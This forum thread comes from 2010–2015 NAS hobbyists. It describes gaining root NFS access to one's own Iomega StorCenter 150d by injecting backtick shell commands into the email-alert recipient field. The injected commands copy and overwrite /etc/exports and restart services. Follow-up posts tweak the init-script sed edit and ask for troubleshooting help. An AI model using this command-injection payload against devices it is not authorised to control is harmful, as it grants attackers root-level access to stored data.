Iomega StorCenter 150d hack (NFS options,full access)

Post Reply
asysadm
Posts: 2
Joined: Sun Jul 04, 2010 8:47 pm

Iomega StorCenter 150d hack (NFS options,full access)

Post by asysadm » Sun Jul 04, 2010 8:58 pm

I initally tried to post it into Iomega support forum but failed - some setup they have for their forum.

I had the same problem as many - I have to upgrade customer hard drive and for that I've planned to shift his 1.2TB of content to the nas and to have him run from there to minimize downtime while I'll resize his LVM partition.

As many here I've discovered that iomega nas exports nfs filesystems with absolutely "usless" options

Code: Select all

(all_squash,insecure,anonuid=254,anongid=254)

- I'm not planning to create appropriate users/groups on the nas itself - it's going to be colossal waste of time and most likely wouldn't help me with my problem anyway.

Now, I've absolutely have to give the credit the the guy who wrote this page - without his discoveries I couldn't have gotten anywhere.

Since the software is based on GPL code I assume that modification of the scripts on my own device is legal (though I'm not entirely sure).

I didn't plan to install special http proxy to fiddle with the web UI traffic - I just needed quick and effective solution to be able to avoid above mentioned annoyance, so I resorted to use just the "email alerts backticks vulnerability" to achieve my goal.

I will be very breif in this instruction, assuming some basic knowledge of unix/Linux, smtp,cifs,nfs,shell scripting.

Prerequisites:
  • -some reachable smtp server with disposable-email@yourdomain.com e-mail address, which aliased to /dev/null - you are going to send a lot of usless test e-mails there.
    -Linux (or Mac?) box with samba and nfs client installed, for editing the scripts and tracking the results.
The procedure itself:
  • 0. VERY IMPORTANT - if your nas contains some important data - BACK IT UP FIRST.This modification does not affect any stored data, but as always it's better to be safe then sorry. Also, do not attempt this on production units - any smallest typo in the commands could bring down your NAS.
    You were warned - I take no responsibility of the outcome of your fiddling with your NAS software/fate of the data stored on it.
    1. Create some user nasuser with naspassword on NAS, and allow full access to "public".
    2. Mount "public" to your linux box. (something like:

    Code: Select all

    mount -t cifs -ousername=nasuser,password=nasuserpassword //nasIP/public /mnt/a
    On the web ui, go to the "Shared Folder Management", and enable NFS full access to the public (becomes /nethdd/public NFS export disk) to your linuxboxIP.
    3. On the web ui "Alerts" configuration page, configure your smtp server info, in the e-mail recipients input line, enter

    Code: Select all

    disposable-email@yourdomain.com`cp /etc/exports /nethdd/public/`
    and click "Send test mail" button.
    On your mounted /mnt/a you can see nfs exports file, something like

    Code: Select all

    "/nethdd/public" linuxboxIP(rw,sync,insecure,all_squash,anonuid=254,anongid=254,no_subtree_check)
    4. Now, we are going to modify this to allow more friendly options and set this friendly options to work all the time (as I found out "all_squash" is hardcoded in makecgi-pro binary, that processes web UI interaction and the only way to modify exports options is to "fix" nfs service script in /etc/init.d, but for that we have to properly nfs mount NAS device /. So, we are modifying exports file on /mnt/a, to look like this

    Code: Select all

    "/nethdd/public" linuxboxIP......
    ^^^^^^^^^^^^^-no changes here, and adding the line

    Code: Select all

    / linuxboxIP(rw,sync,no_root_squash)
    5. Back to our trusted e-mail "Alerts" configuration, E-mail now the recipients line has to look like this:

    Code: Select all

    disposable-email@yourdomain.com`cp /nethdd/public/exports /etc/;/etc/init.d/nfs restart >/tmp/rez 2>&1 &`

    and click "Send test mail" button.
    6. You should be able to nfsmount your NAS / partition with proper options to modify the startup scripts.

    Code: Select all

    mount -t nfs nasIP:/ /mnt/b
    7. Now you can explore and see what else you can do with the NAS system (which looks like stripped down Debian linux to me), but my goal was to improve nfs options so I just resorted to modify /etc/init.d/nfs.
    Here is the diff file (wouldn't hurt to backup the script first):

    Code: Select all

    --- nfs 2010-07-04 19:13:46.465161728 +0200
    +++ nfs.new     2010-07-04 21:15:42.199001136 +0200
    @@ -10,6 +10,7 @@
                    if [ -e /etc/iomnas/auth ]; then
                            . /etc/iomnas/auth
                            if [ "${nfs_enabled}" = "yes" ]; then
    +                               /bin/sed  -i 's/,insecure//;s/anonuid=254,anongid=254,//;s/all_/no_root_/' /etc/exports
                                    /bin/echo "Starting NFS Server"
                                    /bin/echo "Starting Portmap"
                                    /bin/start-stop-daemon --start --exec /bin/portmap
    
    Now, when you go to "Shared Folders Management" web ui page and modify NFS mount options, shares will have proper export options upon nfs daemon restart.
This is it. No all_squash anymore. There is also telnetd installed but not configured - unfortunately I don't have time to play around with it and I'm on another continent from the NAS box itself right now.
Shameless plug - unix sysadmin with 15 year of experience is looking for part-time job (remote only). Contact asysadm AT gmail.com if interested

asysadm
Posts: 2
Joined: Sun Jul 04, 2010 8:47 pm

Re: Iomega StorCenter 150d hack (NFS options,full access)

Post by asysadm » Sun Jul 04, 2010 9:02 pm

This might also work for other iomega NAS devices, testing is non-destructive so you can try it with your iomega box.
Shameless plug - unix sysadmin with 15 year of experience is looking for part-time job (remote only). Contact asysadm AT gmail.com if interested

User avatar
timtim
Posts: 120
Joined: Fri Jul 04, 2008 8:41 pm

Re: Iomega StorCenter 150d hack (NFS options,full access)

Post by timtim » Tue Jul 06, 2010 8:31 pm

Moved this post to Iomega forum with a shadow in dev/general as its quite useful! Be good to get this one in the wiki at some point too!

mla
Posts: 1
Joined: Tue Sep 03, 2013 7:26 am

Re: Iomega StorCenter 150d hack (NFS options,full access)

Post by mla » Tue Sep 03, 2013 7:29 am

I realize this hardware is pretty obsolete now, but for anyone still using it, I discovered how to enable telnet on the device:
http://mlawire.blogspot.com/2013/09/hac ... d-nas.html

pirou01
Posts: 1
Joined: Tue Nov 18, 2014 7:43 pm

Re: Iomega StorCenter 150d hack (NFS options,full access)

Post by pirou01 » Tue Nov 18, 2014 7:50 pm

Hi,

I know this post is really old but I changed a little the procedure above to enable : "Multiple shares with No Root Squash"

We just have to change the line in /etc/init.d/nfs to add the multiples change with sed. (Note the presence of "g" at the end of each substitution)

Code: Select all

                if [ -e /etc/iomnas/auth ]; then
                        . /etc/iomnas/auth
                        if [ "${nfs_enabled}" = "yes" ]; then
+                               /bin/sed  -i 's/,insecure//g;s/anonuid=254,anongid=254,//g;s/all_/no_root_/g' /etc/exports
                                /bin/echo "Starting NFS Server"
                                /bin/echo "Starting Portmap"
                                /bin/start-stop-daemon --start --exec /bin/portmap

With the great work of mla (http://mlawire.blogspot.com/2013/09/hac ... d-nas.html), you can do it directly from a shell using vi.

Have a good day with you "old StorCenter Pro 150d NAS"

cegio71
Posts: 7
Joined: Sun Mar 15, 2015 4:51 pm

Re: Iomega StorCenter 150d hack (NFS options,full access)

Post by cegio71 » Sun Mar 15, 2015 4:55 pm

Hello,
i have lost the CD Recovery of Iomega StorCenter 150D to recovery my nas something can send me the iso?
On lenovo website is not available.

Thanks for your kind cooperation
Best regards
Talarico Sergio

u4david
Posts: 1
Joined: Fri May 29, 2015 7:03 pm

Re: Iomega StorCenter 150d hack (NFS options,full access)

Post by u4david » Fri May 29, 2015 7:49 pm

I enabled telnet on the NAS Iomega 150D FW:85.85
No users created.
static IP assigned to 192.168.1.5

I edited the /etc/init.d/nfs and added the bold line to it:
if [ "${nfs_enabled}" = "yes" ]; then
/bin/sed -i 's/,insecure//;s/anonuid=254,anongid=254,//;s/all_/no_root_/' /etc/exports
/bin/echo "Starting NFS Server"



Created share /nethdd/nas150d > with security settings OPEN;>access type NFS export /nethdd/nas150d and added IP of the linuxbox (full access)

# cat /etc/exports
"/nethdd/nas150d" 192.168.1.10(rw,sync,no_root_squash,no_subtree_check)



When I execute on the linuxbox:
me@linuxbox:~$ sudo mount -t nfs 192.168.1.5:/nethdd/nas150d /mirrorNAS


at first i get nothing, and it times out, come to find out that NFS is not runing on the NAS, so i started it mannually (#/etc/init.d/nfs start)

/etc # cat /var/log/nfs
Stopping NFS utils
no /bin/mountd found; none killed.
killall: nfsd: no process killed
no /bin/statd found; none killed.
no /bin/portmap found; none killed.
rmmod: nfsd: No such file or directory
rmmod: exportfs: No such file or directory
rmmod: lockd: No such file or directory
rmmod: sunrpc: No such file or directory
killall: nfsd: no process killed
killall: mountd: no process killed
killall: statd: no process killed
killall: portmap: no process killed
Starting NFS Server
Starting Portmap
Starting NFS utils
loading kernel module for nfsd
insmod: cannot insert `/lib/nfsd.ko': File exists (-1): File exists
Mounting nfsd filesystem in /proc
Starting NFS statd
Exporting NFS directories
Starting NFS daemon
Starting mountd daemon




after that I try again:

me@linuxbox:~$ sudo mount -t nfs 192.168.1.5:/nethdd/nas150d /mirrorNAS
mount.nfs: rpc.statd is not running but is required for remote locking.
mount.nfs: Either use '-o nolock' to keep locks local, or start statd.
mount.nfs: an incorrect mount option was specified

me@linuxbox:
start: Job is already running: statd

Q:
Why doe she NFS does not start automatically?

And what is that i'm doing wrong that I'm unable to mount?

Can I get the recovery ISO please?

Can I install Debian OS on this NAS? if so what is recommended?

Thank you

Post Reply